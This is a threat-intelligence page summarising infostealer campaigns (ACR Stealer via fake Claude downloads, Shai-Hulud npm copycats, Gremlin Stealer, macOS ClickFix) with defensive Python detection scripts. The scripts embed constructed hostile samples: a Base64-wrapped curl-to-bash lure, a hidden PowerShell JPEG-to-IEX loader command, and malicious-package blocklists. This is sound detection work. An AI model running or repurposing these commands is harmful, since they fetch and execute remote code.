ctipilot.ch

ACR Stealer distributed via counterfeit Claude AI download pages + malicious search ads

campaign · campaign:acr-stealer-fake-claude

Coverage timeline: 1 (first 2026-05-26 → last 2026-05-26)
Briefs: 1 (1 distinct)
Sources cited: 92 (39 hosts)
Sections touched: 1 (active_threats)
Co-occurring entities: 8

Story timeline

  1. 2026-05-26 · CTI Daily Brief — 2026-05-26
     active_threats · First coverage: SANS ISC; ZIP -> PowerShell -> JPEG-staged ACR Stealer; AI-brand malvertising. [SINGLE-SOURCE]

Where this entity is cited

  • active_threats (1)

Source distribution

  • attack.mitre.org: 18 (20%)
  • thehackernews.com: 11 (12%)
  • nvd.nist.gov: 5 (5%)
  • socket.dev: 4 (4%)
  • stepsecurity.io: 4 (4%)
  • isc.sans.edu: 3 (3%)
  • malwarebytes.com: 3 (3%)
  • bleepingcomputer.com: 3 (3%)
  • other: 41 (45%)

Items in briefs about ACR Stealer distributed via counterfeit Claude AI download pages + malicious search ads (4)

ACR Stealer distributed through counterfeit Claude AI download pages promoted by malicious search ads [SINGLE-SOURCE]

From CTI Daily Brief — 2026-05-26 · published 2026-05-26 · view item permalink →

SANS ISC handler Brad Duncan documented a delivery chain that impersonates Anthropic's Claude desktop app: counterfeit "Download for Windows" pages hosted on sites.google.com are promoted through malicious search ads and ultimately drop ACR Stealer (SANS Internet Storm Center, 2026-05-26). Clicking the download button delivers a corrupted ZIP archive containing obfuscated PowerShell. The chain also involves a JPEG image whose precise role the SANS ISC analyst could not determine (no embedded data was identified in it), and it ends with execution of ACR Stealer, a commodity infostealer that harvests credentials and browser data (T1566.002, T1059.001). [SINGLE-SOURCE]: reported by SANS ISC only at time of writing.

Why it matters to us: this is the demand-side mirror of the TrapDoor item in the same brief, attackers monetising trust in AI tooling, here against ordinary employees searching for an AI desktop client rather than against developers. Add Anthropic/Claude and other AI-brand impersonation to brand-abuse and malvertising monitoring. Hunt for powershell.exe spawned by a browser or archive-extraction parent, or launched from a Downloads or Temp path (Sysmon EID 1 / Windows 4688, especially with -nop, -w hidden or -enc on the command line); for PowerShell reading image files (Get-Content or ReadAllBytes on a .jpg) and handing the bytes to a loader such as IEX; and for outbound connections from powershell.exe to newly registered domains (Sysmon EID 3 / EID 22 joined with domain-age enrichment). Because SANS ISC found no embedded data in the JPEG, treat the image-read pivot as corroboration rather than as a primary indicator; the launcher switches and the parent-process relationship are the higher-fidelity signals.

UPDATE: TeamPCP / Shai-Hulud — first copycat wave (Phantom Bot + SSH/cloud stealers), Checkmarx Jenkins plugin trojanised again, PCPJack rival worm hits exposed cloud services

From CTI Daily Brief — 2026-05-19 · published 2026-05-19 · view item permalink →

UPDATE (originally covered 2026-05-13, 2026-05-15): Three concurrent developments show the TeamPCP / Shai-Hulud campaign has entered an open-source-imitator phase following Datadog Security Labs' 2026-05-13 analysis of the leaked Shai-Hulud worm source code. First, OX Security disclosed on 2026-05-17 four malicious npm packages published by the account deadcode09284814: chalk-tempalte, @deadcode09284814/axios-util, axois-utils, and color-style-utils, with combined weekly downloads of roughly 3,000 (OX Security, 2026-05-17; The Hacker News, 2026-05-18). chalk-tempalte is a near-unmodified clone of the leaked Shai-Hulud worm with a modified C2 server and a new attacker-controlled key embedded in the code; the two primary sources disagree on whether this is a public or a private key (see § 7 of that brief). axois-utils bundles "Phantom Bot", a Go HTTP/TCP/UDP/Reset-flood DDoS tool with Windows Startup-folder and Linux scheduled-task persistence that survives removal of the package; the other two harvest SSH keys, cloud-provider credentials (AWS/GCP/Azure), and cryptocurrency wallet data.

Second, a 2026-05-18 SANS ISC campaign update confirmed that Checkmarx officially acknowledged on 2026-05-11 that its Jenkins AST Scanner plugin had been trojanised: version 2026.5.09, compromise window 2026-05-09 01:25 UTC to 2026-05-10 08:47 UTC, which makes this TeamPCP's third confirmed Checkmarx intrusion in three months (SANS Internet Storm Center, 2026-05-18; Checkmarx, 2026-05-12). Hundreds of Jenkins controllers installed the malicious plugin before removal; the remediated builds 2.0.13-848 and 2.0.13-847 are safe. CxSAST on-premise was unaffected; the cloud-integrated checkmarx/ast-github-action, checkmarx/kics-github-action, and VS Code extensions were all trojanised.

Third, SentinelLabs disclosed on 2026-05-07 (also folded into the SANS ISC summary) "PCPJack", a rival cloud worm that scans for exposed Docker, Kubernetes, Redis, MongoDB and RayML services and chains five CVEs for initial access (CVE-2025-29927 Next.js middleware auth bypass; CVE-2025-55182 Next.js Server Actions deserialization; CVE-2026-1357 WPVivid arbitrary file upload; CVE-2025-9501 W3 Total Cache RCE; CVE-2025-48703 CentOS Web Panel command injection), then explicitly kills TeamPCP processes and removes TeamPCP artefacts before harvesting credentials. SentinelLabs assesses with moderate confidence that the operator may be a former TeamPCP affiliate.

Defender takeaway for the Swiss/EU public-sector SOC: developer endpoints and CI/CD runners with the Checkmarx plugin installed should be audited for plugin builds (versions and artefact hashes) outside the known-safe set, with particular attention to installs during the 2026-05-09 → 2026-05-10 window; npm audit and SBOM scans should flag the deadcode09284814 author/scope and the four package names; egress from CI runners to *.lhr.life hostnames is a high-fidelity hunt pivot for the npm worm wave; Docker, Kubernetes, Redis and MongoDB endpoints exposed to the internet should be inventoried and removed from public exposure (PCPJack's scan list). MITRE T1195.002 (Supply Chain Compromise: Compromise Software Supply Chain), T1552.001 (Credentials In Files), T1041 (Exfiltration Over C2 Channel).
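The lockfile and egress checks from the defender takeaway above, as an added Python example; this is not OX Security's, SANS ISC's or the brief's own code. It assumes an npm lockfile v2/v3 layout ("packages" keyed by node_modules path), a constructed proxy-log line format for the runner egress, and a guessed list of the legitimate package names the copycats imitate. It goes one step beyond the text by also flagging near-miss names with an edit-distance check, so a renamed copycat under a fresh account still surfaces.

```python
"""Added example (not OX Security's, SANS ISC's or the brief's code): check an npm
lockfile and CI-runner egress lines against the TeamPCP copycat indicators above.
Assumptions: lockfile v2/v3 layout; constructed proxy-log format; TYPOSQUAT_TARGETS
is our guess at the legitimate names the copycat packages imitate."""
import fnmatch
import json
from typing import Dict, List

# Indicators taken from the reporting summarised above.
BLOCKED_SCOPES = {"@deadcode09284814"}
BLOCKED_PACKAGES = {"chalk-tempalte", "axois-utils", "color-style-utils"}
EGRESS_PATTERNS = ["*.lhr.life"]
# Legitimate names the copycats resemble (assumption; extend with your own top dependencies).
TYPOSQUAT_TARGETS = {"chalk-template", "axios-utils", "chalk", "axios"}


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance with a rolling row; package names are short, so O(n*m) is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def package_name(lock_path: str) -> str:
    """'node_modules/a/node_modules/@s/b' -> '@s/b' (nested deps keep only the leaf name)."""
    return lock_path.rsplit("node_modules/", 1)[-1]


def scan_lockfile(lock: dict) -> Dict[str, List[str]]:
    """Return {package: [reasons]} for every dependency that trips an indicator."""
    findings: Dict[str, List[str]] = {}
    for path in lock.get("packages", {}):
        if not path:  # "" is the root project entry, not a dependency
            continue
        name = package_name(path)
        reasons = []
        if name.startswith("@") and name.split("/")[0] in BLOCKED_SCOPES:
            reasons.append("published under blocked scope " + name.split("/")[0])
        if name in BLOCKED_PACKAGES:
            reasons.append("name on blocklist")
        for target in TYPOSQUAT_TARGETS:
            if 1 <= edit_distance(name, target) <= 2:  # 0 would be the real package
                reasons.append(f"typosquat of {target}")
        if reasons:
            findings[name] = reasons
    return findings


def scan_egress(lines: List[str]) -> List[str]:
    """Hosts from constructed 'CONNECT host:port' proxy lines that match the hunt patterns."""
    hits = []
    for line in lines:
        host = line.split()[-1].rsplit(":", 1)[0].lower()
        if any(fnmatch.fnmatch(host, pattern) for pattern in EGRESS_PATTERNS):
            hits.append(host)
    return hits


# Constructed sample input: a lockfile with two bad entries, and three egress lines.
SAMPLE_LOCK = json.loads("""{
  "name": "ci-demo", "lockfileVersion": 3,
  "packages": {
    "": {"name": "ci-demo", "version": "1.0.0"},
    "node_modules/chalk": {"version": "5.3.0"},
    "node_modules/axios": {"version": "1.7.2"},
    "node_modules/chalk-tempalte": {"version": "1.0.3"},
    "node_modules/@deadcode09284814/axios-util": {"version": "0.1.0"},
    "node_modules/lodash": {"version": "4.17.21"}
  }
}""")
SAMPLE_EGRESS = [
    "2026-05-18T10:02:11Z runner-07 CONNECT registry.npmjs.org:443",
    "2026-05-18T10:02:13Z runner-07 CONNECT github.com:443",
    "2026-05-18T10:02:40Z runner-07 CONNECT 8f3a2c1d.lhr.life:443",
]

if __name__ == "__main__":
    for pkg, why in scan_lockfile(SAMPLE_LOCK).items():
        print(f"FLAG {pkg}: {'; '.join(why)}")
    for host in scan_egress(SAMPLE_EGRESS):
        print(f"EGRESS {host}")
```

Run it against a real package-lock.json by replacing SAMPLE_LOCK with json.load(open("package-lock.json")); the edit-distance threshold of 2 catches the two transposition squats seen here but will also match a few legitimate neighbours (for example "chalk" vs "chalks"), so review hits rather than failing the build on them automatically.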

Unit 42: Gremlin Stealer evolved with .NET-resource XOR obfuscation, real-time crypto-clipper, and WebSocket browser-process session-hijack module [SINGLE-SOURCE]

From CTI Daily Brief — 2026-05-16 · published 2026-05-16 · view item permalink →

Palo Alto Networks Unit 42 published on 2026-05-15 an analysis of evolved variants of the Gremlin information stealer, adding three new capability tiers that matter to defenders whose endpoint detections are tuned to older Gremlin samples (Palo Alto Networks Unit 42, 2026-05-15). Obfuscation has shifted to XOR-keyed encrypted payloads embedded in .NET resource sections, combined with single- or double-character identifier renaming and a runtime string-decoder function (_003CModule_003E.c(), i.e. <Module>.c() with the angle brackets escaped), which defeats static signatures written against the string literals that earlier Gremlin samples carried in the clear. A new crypto-clipper component continuously monitors the system clipboard and replaces Bitcoin and Ethereum wallet addresses with attacker-controlled equivalents in real time (T1115). The most operationally interesting addition is a WebSocket-based session-hijack module that reads the memory of running Chromium-based browser processes to extract session tokens directly, bypassing the cookie-encryption mitigations modern browsers apply at rest (T1185 Browser Session Hijacking). Credential scope includes browser cookies, session tokens, saved passwords, payment-card details, FTP and VPN credentials, Discord tokens (dedicated regex scanner), clipboard content, and cryptocurrency wallet files. Exfiltration is HTTPS POST to a private web panel, with a Telegram Bot API channel as the secondary path. Detection: Sysmon EID 10 (process access) with TargetImage chrome.exe, msedge.exe or another Chromium-based browser and a SourceImage that is neither the browser itself nor a known security agent, especially where GrantedAccess includes PROCESS_VM_READ (0x0010); clipboard-listener registration from non-standard processes (the generic Windows clipboard-listener API surface). Hardening: browser isolation for high-value sessions; clipboard-API access audited in EDR telemetry. Single-source (Unit 42 only); flagged for verification.
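The Sysmon hunts from the ACR Stealer item above (EID 1: PowerShell launched by a browser or archive parent, stealth switches, image-file reads) and from this Gremlin item (EID 10: a non-browser process reading Chromium memory), as one added Python triage example. It is not code from SANS ISC, Unit 42 or the brief; the parent and source allowlists, the scoring weights and the sample events are assumptions and constructed input.

```python
"""Added example (not SANS ISC's, Unit 42's or the brief's code): a triage pass over
constructed Sysmon-style events for the two hunts described above.
Rule A (ACR Stealer item, EID 1): powershell/pwsh started by a browser or archive tool,
from a download/temp path, with stealth switches, or reading an image file into a loader.
Rule B (Gremlin item, EID 10): a non-browser process opening a Chromium browser with
PROCESS_VM_READ.  Allowlists, weights and sample events are assumptions/constructed."""
import re
from typing import Dict, List, Tuple

BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "vivaldi.exe", "opera.exe", "firefox.exe"}
CHROMIUM = BROWSERS - {"firefox.exe"}
ARCHIVERS = {"7zfm.exe", "7zg.exe", "winrar.exe", "peazip.exe"}
# Allowlisting by basename is a simplification; match on the full, signed path in production.
ACCESS_ALLOWLIST = CHROMIUM | {"csrss.exe", "lsass.exe", "wmiprvse.exe", "msmpeng.exe", "taskmgr.exe"}
PROCESS_VM_READ = 0x10
FLAG_THRESHOLD = 2  # a single weak Rule A signal (e.g. only a Downloads path) is noise

STEALTH_SWITCHES = re.compile(
    r"(?i)(?:^|\s)-(?:nop\b|noprofile\b|w(?:indowstyle)?\s+hidden\b"
    r"|e(?:p|xecutionpolicy)\s+bypass\b|e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,})")
DOWNLOAD_PATH = re.compile(r"(?i)\\(?:downloads|temp|appdata\\local\\temp)(?:\\|$)")
IMAGE_FILE = re.compile(r"(?i)\.(?:jpe?g|png|gif|bmp)\b")
CODE_LOADER = re.compile(r"(?i)get-content|readallbytes|readalltext|\biex\b|invoke-expression|frombase64string")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_process_create(ev: Dict) -> List[str]:
    """Rule A: reasons when the weighted score reaches FLAG_THRESHOLD, else []."""
    if basename(ev.get("Image", "")) not in {"powershell.exe", "pwsh.exe"}:
        return []
    cmd, parent = ev.get("CommandLine", ""), basename(ev.get("ParentImage", ""))
    scored: List[Tuple[int, str]] = []
    if parent in BROWSERS:
        scored.append((2, f"spawned by browser {parent}"))
    elif parent in ARCHIVERS:
        scored.append((2, f"spawned by archive tool {parent}"))
    if DOWNLOAD_PATH.search(cmd) or DOWNLOAD_PATH.search(ev.get("CurrentDirectory", "")):
        scored.append((1, "download/temp path referenced"))
    if STEALTH_SWITCHES.search(cmd):
        scored.append((2, "stealth launcher switches (-nop/-w hidden/-enc/-ep bypass)"))
    if IMAGE_FILE.search(cmd) and CODE_LOADER.search(cmd):
        scored.append((3, "image file read into a code loader"))
    if sum(weight for weight, _ in scored) < FLAG_THRESHOLD:
        return []
    return [reason for _, reason in scored]


def triage_process_access(ev: Dict) -> List[str]:
    """Rule B: GrantedAccess is the hex string Sysmon logs (e.g. '0x1410')."""
    target, source = basename(ev.get("TargetImage", "")), basename(ev.get("SourceImage", ""))
    if target not in CHROMIUM or source in ACCESS_ALLOWLIST:
        return []
    granted = int(ev.get("GrantedAccess", "0x0"), 16)
    if granted & PROCESS_VM_READ:
        return [f"{source} opened {target} with PROCESS_VM_READ (0x{granted:X})"]
    return []


def triage(events: List[Dict]) -> List[Tuple[int, List[str]]]:
    """(RecordId, reasons) for every event that trips Rule A or Rule B."""
    hits = []
    for ev in events:
        eid = ev.get("EventID")
        reasons = triage_process_create(ev) if eid == 1 else triage_process_access(ev) if eid == 10 else []
        if reasons:
            hits.append((ev["RecordId"], reasons))
    return hits


# Constructed sample events; field names follow Sysmon's EventData.
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 1,  # archive extracted, PowerShell reads a JPEG into IEX
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\7-Zip\7zFM.exe",
     "CurrentDirectory": r"C:\Users\alice\Downloads\Claude_Setup",
     "CommandLine": r'''powershell.exe -nop -w hidden -c "$b=[IO.File]::ReadAllBytes('C:\Users\alice\Downloads\Claude_Setup\bg.jpg');IEX([Text.Encoding]::ASCII.GetString($b[4096..8191]))"'''},
    {"RecordId": 2, "EventID": 1,  # admin opening a console from the Start menu: benign
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CurrentDirectory": r"C:\Users\bob",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'},
    {"RecordId": 3, "EventID": 1,  # browser-spawned, hidden, encoded command
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "ParentImage": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "CurrentDirectory": r"C:\Users\carol\AppData\Local\Temp",
     "CommandLine": "pwsh -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"},
    {"RecordId": 4, "EventID": 10,  # unknown binary reads Chrome memory
     "SourceImage": r"C:\Users\alice\AppData\Roaming\Updater\client.exe",
     "TargetImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "GrantedAccess": "0x1410"},
    {"RecordId": 5, "EventID": 10,  # Defender scanning Edge: allowlisted
     "SourceImage": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18\MsMpEng.exe",
     "TargetImage": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe", "GrantedAccess": "0x1410"},
]

if __name__ == "__main__":
    for record_id, reasons in triage(SAMPLE_EVENTS):
        print(f"RecordId {record_id}: " + "; ".join(reasons))
```

The weighted score in Rule A is the point of the design: "powershell from Downloads" alone is something every helpdesk script does, but combined with a browser or archiver parent, or with -w hidden/-enc, it is rare in legitimate use. For Rule B, extend ACCESS_ALLOWLIST with your EDR and backup agents before deploying, and prefer full-path matching, because a dropper named chrome.exe in %AppData% would otherwise pass the basename check.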

ClickFix campaign expands to macOS — Macsync, Shub Stealer and AMOS delivered via Base64 Terminal commands that bypass Gatekeeper

From CTI Daily Brief — 2026-05-10 · published 2026-05-10 · view item permalink →

Microsoft Threat Intelligence on 2026-05-06 documented an active ClickFix social-engineering campaign now targeting macOS users through fake utility-installation guides hosted on Medium, Squarespace, and Craft-built blogs (Microsoft Security Blog, 2026-05-06 · Malwarebytes, earlier Shub Stealer wave, 2026-03). The lure pages instruct the visitor to copy a Base64-encoded command into Terminal; the decoded one-liner pipes a remote shell script straight into bash, sidestepping Gatekeeper because no quarantined application bundle is ever launched. Three distinct infostealers, Macsync, Shub Stealer, and AMOS (Atomic macOS Stealer), are delivered across campaign variants per Microsoft, harvesting macOS Keychain entries, browser-profile credentials, iCloud data, and cryptocurrency wallet keys (Trezor, Ledger, Exodus, Electrum, Atomic, Coinomi, MetaMask, Phantom). Some variants substitute backdoored DMG copies of legitimate wallet applications (Ledger Live, Trezor Suite). Persistence uses LaunchAgent / LaunchDaemon plists, with Telegram as fallback C2.

ATT&CK mapping: T1204.002 User Execution: Malicious File (T1204.004 User Execution: Malicious Copy and Paste is the closer fit for a pasted Terminal command), T1059.004 Unix Shell, T1555.001 Credentials from Password Stores: Keychain. Detection concepts: alert on Terminal spawning curl or wget immediately followed by pipe-to-shell execution from a non-developer profile; LaunchAgent / LaunchDaemon plist creation whose Program or ProgramArguments path lies outside /Applications or /Library/Application Support/<vendor>; anomalous access to the login keychain from processes without UI entitlements (on EDR-instrumented Macs the Endpoint Security framework exposes this through notify events such as ES_EVENT_TYPE_NOTIFY_OPEN on the keychain database files).
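The two triage steps the detection concepts above call for, as an added Python example that is not Microsoft's, Malwarebytes' or the brief's code: unwrap a ClickFix-style Base64 Terminal command to see what it really runs, then check a LaunchAgent plist's program path. The lure, the payload URL (a reserved .invalid domain) and both plists are constructed; the list of trusted program prefixes is an assumption.

```python
"""Added example (not Microsoft's, Malwarebytes' or the brief's code): decode a
ClickFix-style Base64 Terminal one-liner layer by layer and flag pipe-to-shell
and quarantine-stripping patterns; then check a LaunchAgent plist's program path.
The lure, payload URL and plists are constructed; TRUSTED_PROGRAM_PREFIXES is an assumption."""
import base64
import plistlib
import re
from typing import List

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
NESTED_B64 = re.compile(r"\bbase64\s+(?:-D|-d|--decode)\b")
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")
CMD_SUBST_SHELL = re.compile(r"\b(?:ba|z)?sh\s+-c\s+[\"']?\$\((?:curl|wget)\b")
QUARANTINE_STRIP = re.compile(r"\bxattr\b[^|;&]*(?:-c\b|com\.apple\.quarantine)")
TRUSTED_PROGRAM_PREFIXES = ("/Applications/", "/Library/Application Support/", "/System/", "/usr/")


def unwrap(command: str, max_depth: int = 3) -> List[str]:
    """Return the pasted command followed by each Base64 layer it decodes and executes."""
    layers = [command]
    for _ in range(max_depth):
        outer = layers[-1]
        token = B64_TOKEN.search(outer)
        if not NESTED_B64.search(outer) or not token:
            break
        blob = token.group(0)
        blob += "=" * (-len(blob) % 4)  # lures often drop the padding
        try:
            layers.append(base64.b64decode(blob).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError: not really Base64
            break
    return layers


def assess_command(command: str) -> List[str]:
    """Reasons a pasted Terminal command looks like a ClickFix lure, across all layers."""
    layers = unwrap(command)
    reasons = set()
    if len(layers) > 1:
        reasons.add("base64-wrapped command decoded at runtime")
    for layer in layers:
        if PIPE_TO_SHELL.search(layer) or CMD_SUBST_SHELL.search(layer):
            reasons.add("remote script piped to a shell (Gatekeeper never consulted)")
        if QUARANTINE_STRIP.search(layer):
            reasons.add("quarantine attribute stripped with xattr")
    return sorted(reasons)


def check_launch_agent(plist_bytes: bytes) -> List[str]:
    """Flag a LaunchAgent/LaunchDaemon plist whose program lives outside trusted prefixes."""
    plist = plistlib.loads(plist_bytes)
    program = plist.get("Program") or (plist.get("ProgramArguments") or [""])[0]
    reasons = []
    if not program.startswith(TRUSTED_PROGRAM_PREFIXES):
        reasons.append(f"program outside trusted paths: {program}")
    if str(plist.get("Label", "")).startswith("com.apple.") and not program.startswith("/System/"):
        reasons.append("Apple-looking label for a non-system program")
    return reasons


# Constructed lure: what the fake installation guide tells the victim to paste.
PAYLOAD = "curl -fsSL https://update.example.invalid/helper.sh | bash"
LURE_COMMAND = "echo " + base64.b64encode(PAYLOAD.encode()).decode() + " | base64 -D | bash"

# Constructed plists: one mimicking Apple from a hidden cache directory, one ordinary vendor agent.
MALICIOUS_PLIST = plistlib.dumps({
    "Label": "com.apple.safari.helper",
    "ProgramArguments": ["/Users/alice/Library/Caches/.helper/agent", "--quiet"],
    "RunAtLoad": True, "KeepAlive": True,
})
BENIGN_PLIST = plistlib.dumps({
    "Label": "com.example.updater",
    "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/updater"],
    "RunAtLoad": True,
})

if __name__ == "__main__":
    for depth, layer in enumerate(unwrap(LURE_COMMAND)):
        print(f"layer {depth}: {layer}")
    print(assess_command(LURE_COMMAND))
    print(check_launch_agent(MALICIOUS_PLIST), check_launch_agent(BENIGN_PLIST))
```

Unwrapping matters because the outer command ("echo ... | base64 -D | bash") contains nothing a curl-pipe rule would match; the indicator only appears once the layer is decoded, which is exactly why the lure is encoded. Feed real plists from ~/Library/LaunchAgents and /Library/LaunchDaemons into check_launch_agent; adjust TRUSTED_PROGRAM_PREFIXES for Homebrew (/opt/homebrew/) or other legitimate install roots in your fleet.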